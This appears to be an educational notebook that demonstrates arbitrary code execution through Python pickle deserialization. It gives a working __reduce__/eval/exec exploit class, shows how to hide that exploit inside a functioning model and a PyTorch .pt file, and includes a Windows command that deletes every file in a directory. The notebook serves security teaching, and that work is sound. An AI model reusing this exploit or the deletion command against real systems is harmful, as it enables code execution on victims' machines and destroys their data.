# The _Pickle_ Exploit

Return to the [castle](https://github.com/Nkluge-correa/teeny-tiny_castle).

**[Python](https://www.python.org/) is one of the main programming languages used for _data science_ and _machine learning_ purposes. As such, developers using this language need to be aware of the types of vulnerabilities that python presents.**

**In this paper, we will exploit a vulnerability in the Python _[Pickle](https://docs.python.org/3/library/pickle.html#)_ module, used for serializing and de-serializing python object structures.**

- _The process to converts any kind of python objects (list, dict, etc.) into byte streams (0s and 1s) is called pickling. And here is where our problems start: **almost anything can be turned into a pickle**..._

![pickle](https://media3.giphy.com/media/JmPenP1svctdfDCEHi/giphy.gif)

**Let's first define a malicious python executable that we would like to run. However, _anything that python can execute can be made into a payload_ (e.g., batch/shell code). For example:**

```python

import os
os.system('''for /F "delims=" %%i in ('dir /b') do (rmdir "%%i" /s/q || del "%%i" /s/q)''')

```

**This payload will delete all files and directories in the current working directory of some poor soul. But let's do something more pythonic, and less evil.**


In [2]:

def foo_u():
    import os
    for i in range(1, 11):
        os.mkdir(f'{"HA" * i}')

    import webbrowser
    webbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")

    import sys
    del sys.modules["os"]
    del sys.modules["webbrowser"]


**This function will (like the example "malware" used in our notebook on malware detection) create a series of directories (exactly 10) titled "HA" and open your browser to the **[teeny-tiny_castle](https://github.com/Nkluge-correa/teeny-tiny_castle)** repository. This could be turned into something much more harmful, but you should never create malicious code to be used against others.**

**Now, let's transform this function into a string, which we will later inject into a pickle file. For this we can use the `inspect` module and some of it's utilities.**


In [3]:

import inspect

# Turns a python function into single string

source = inspect.getsourcelines(foo_u)[0]
source = source[1:]
find_indent = len(source[0]) - len(source[0].lstrip())
source = [line[find_indent:] for line in source]
inject_src = "\n".join(source)

# Now, something like exec(inject_src) will run this payload (the exec function is used when you want to execute a file or program)

print(inject_src)


import os

for i in range(1, 11):

    os.mkdir(f'{"HA" * i}')


import webbrowser

webbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")


import sys

del sys.modules["os"]

del sys.modules["webbrowser"]



**The vulnerability of the pickle module poses a risk to ML engineers and practitioners given the fact that [Pytorch](https://pytorch.org/), among other libraries built upon it (e.g., [HuggingFace](https://huggingface.co/)) [use pickle to save/load a serialized objects (models) to/from disk](https://pytorch.org/docs/master/generated/torch.load.html).**

**This vulnerability is made explicit in both the `pickle` module documentation:**

> [Warning](https://docs.python.org/3/library/pickle.html): The `pickle` module **is not secure**. Only unpickle data you trust. It is possible to construct malicious pickle data which will **execute arbitrary code during unpickling**. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.

And in `Pytorch`:

> [`torch.load()`](https://pytorch.org/docs/master/generated/torch.load.html#torch.load "torch.load") uses `pickle` module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source, or that could have been tampered with. **Only load data you trust**.

**As a preventive measure, we can inspect pickle objects with the `pickletools`.**


In [4]:
import pickletools
import pickle

with open('pickle', 'wb') as handle:
    pickle.dump(inject_src, handle, protocol=pickle.HIGHEST_PROTOCOL)

# pickle inspection

import os
os.popen('python -mpickle pickle').read()

# or

my_pickle = pickle.dumps(inject_src)

pickletools.dis(my_pickle)


    0: \x80 PROTO      4
    2: \x95 FRAME      225
   11: \x8c SHORT_BINUNICODE 'import os\n\nfor i in range(1, 11):\n\n    os.mkdir(f\'{"HA" * i}\')\n\n\nimport webbrowser\n\nwebbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")\n\n\nimport sys\n\ndel sys.modules["os"]\n\ndel sys.modules["webbrowser"]\n'
  234: \x94 MEMOIZE    (as 0)
  235: .    STOP
highest protocol among opcodes = 4


**Here we can see the contents of this pickle file. But a string alone cannot execute code. We need something that will _execute_ the contents of this string when a pickle file is loaded.**

**`Pickle` allows you to define a custom behavior for the pickling process for your class instances. Implementing the `__reduce__` method is exactly what we would need to get code execution.**

> The `__reduce__()` method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the “reduce value”). […] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order: (1) a callable object that will be called to create the initial version of the object; (2) a tuple of arguments for the callable object; and (3) an empty tuple must be given if the callable does not accept any argument.

**Thus, by implementing `__reduce__` in a class which instances we are going to pickle, we can give the pickling process a callable plus some arguments to run. While intended for reconstructing objects, we can abuse this for getting our own code executed.**

**Here we create a class that takes as its argument a dictionary, and a string (our payload), and returns a dictionary and the evaluation (`eval`) of an executing function (`exec`) that runs our payload through the `__reduce__` method.**


In [15]:
class EXPLOIT(dict):

    def __init__(self, inject_src: str, **kwargs):

        super().__init__(**kwargs)
        self._inject_src = inject_src

    def __reduce__(self):
        return eval, (f"exec('''{self._inject_src}''') or dict()",), None, None, iter(self.items())


**Trough this trickery, we can save our executable payload without activating it in the process. And when we evaluate the save object, we see that we have a string of code inside an `exec` function. This function will be executed the second we load this object.**

**Note: _the dictionary will still be intact after this process, so you can save a useful model that works when loaded, but executes some malicious code in the background after the model is loaded. Bellow, we create the simplest linear model as an example_.**


In [30]:
import pickletools
my_dict = {'model': 'my_model', 'w': 1.0076, 'b': 0.1234}


with open('bad_pickle', 'wb') as handle:
    pickle.dump(EXPLOIT(inject_src, **my_dict), handle,
                protocol=pickle.HIGHEST_PROTOCOL)


my_bad_pickle = pickle.dumps(EXPLOIT(inject_src, **my_dict))

pickletools.dis(my_bad_pickle)


    0: \x80 PROTO      4
    2: \x95 FRAME      318
   11: \x8c SHORT_BINUNICODE 'builtins'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'eval'
   28: \x94 MEMOIZE    (as 1)
   29: \x93 STACK_GLOBAL
   30: \x94 MEMOIZE    (as 2)
   31: \x8c SHORT_BINUNICODE 'exec(\'\'\'import os\n\nfor i in range(1, 11):\n\n    os.mkdir(f\'{"HA" * i}\')\n\n\nimport webbrowser\n\nwebbrowser.open("https://github.com/Nkluge-correa/teeny-tiny_castle")\n\n\nimport sys\n\ndel sys.modules["os"]\n\ndel sys.modules["webbrowser"]\n\'\'\') or dict()'
  276: \x94 MEMOIZE    (as 3)
  277: \x85 TUPLE1
  278: \x94 MEMOIZE    (as 4)
  279: R    REDUCE
  280: \x94 MEMOIZE    (as 5)
  281: (    MARK
  282: \x8c     SHORT_BINUNICODE 'model'
  289: \x94     MEMOIZE    (as 6)
  290: \x8c     SHORT_BINUNICODE 'my_model'
  300: \x94     MEMOIZE    (as 7)
  301: \x8c     SHORT_BINUNICODE 'w'
  304: \x94     MEMOIZE    (as 8)
  305: G        BINFLOAT   1.0076
  314: \x8c     SHORT_BINUNICODE 'b'
  317: \x94     M

**⚠️Warning! ONLY EXECUTE THE NEXT CELL IF YOU WANT TO EXECUTE THE PAYLOAD (THE ONE PROVIDED IN THIS ORIGINAL NOTEBOOK IS HARMLESS).⚠️**


In [32]:
import plotly.graph_objects as go
import numpy as np
with open(r"bad_pickle", "rb") as input_file:
    my_dict = pickle.load(input_file)

print(my_dict)

w0 = my_dict['w']
b0 = my_dict['b']


x = np.random.randn(200)*2
noise = np.random.normal(1, 20, 200)*0.05
y = x + noise

model_LR = np.dot(x, w0) + b0

fig = go.Figure(data=go.Scatter(
    x=x, y=y, mode='markers', name='Mystery Function'))
fig.update_layout(template='plotly_dark',
                  title='Loaded Model Still Works!',
                  paper_bgcolor='rgba(0, 0, 0, 0)',
                  plot_bgcolor='rgba(0, 0, 0, 0)')
fig.add_trace(go.Scatter(x=x, y=model_LR,
              name=f'my_model = {round(w0, 4)} * x + {round(b0, 4)}'))


fig.show()


{'model': 'my_model', 'w': 1.0076, 'b': 0.1234}


**How might this affect ML engineers and practitioners in the field? Libraries like `HuggingFace` democratize ML research by sharing models for n types of tasks. However, nothing prevents an attacker from uploading a model to the platform (or code sharing platform, e.g., `GitHub`) that contains malicious code to be executed during upload.**

**Below we have created an `.pt` file (a machine learning model created using PyTorch) that contains nothing but "222.222.222 zeros", plus a malicious executable.**

**A malicious attacker could save such a model (or a totally legitimate model), send it to a public repository, make a good advertisement for his `ultimate_model_to_rule_all_models`, and hope that curiosity will lure victims into his trap.**


In [35]:
import torch

junk = torch.zeros(222222222)

model = {
    "ultimate_model_to_rule_all_models": junk,
}

ultimate_model = EXPLOIT(inject_src, **model)

torch.save(ultimate_model, 'ultimate_model_to_rule_all_models.pt')


**⚠️Warning! ONLY EXECUTE THE NEXT CELL IF YOU WANT TO EXECUTE THE PAYLOAD (THE ONE PROVIDED IN THIS ORIGINAL NOTEBOOK IS HARMLESS).⚠️**


In [37]:
model = torch.load('ultimate_model_to_rule_all_models.pt')

print(model)


{'ultimate_model_to_rule_all_models': tensor([0., 0., 0.,  ..., 0., 0., 0.])}


**The moral of the story is that you should take the warnings in the `Pickle` and `Pytorch` bilibrary documentation seriously.**

> [Warning](https://docs.python.org/3/library/pickle.html): The `pickle` module **is not secure**. Only unpickle data you trust. It is possible to construct malicious pickle data which will **execute arbitrary code during unpickling**.

**As a precaution, one possible security measure would involve only loading templates from unverified sources into virtual machines. Stay safe folks! 🙃**

---

Return to the [castle](https://github.com/Nkluge-correa/teeny-tiny_castle).
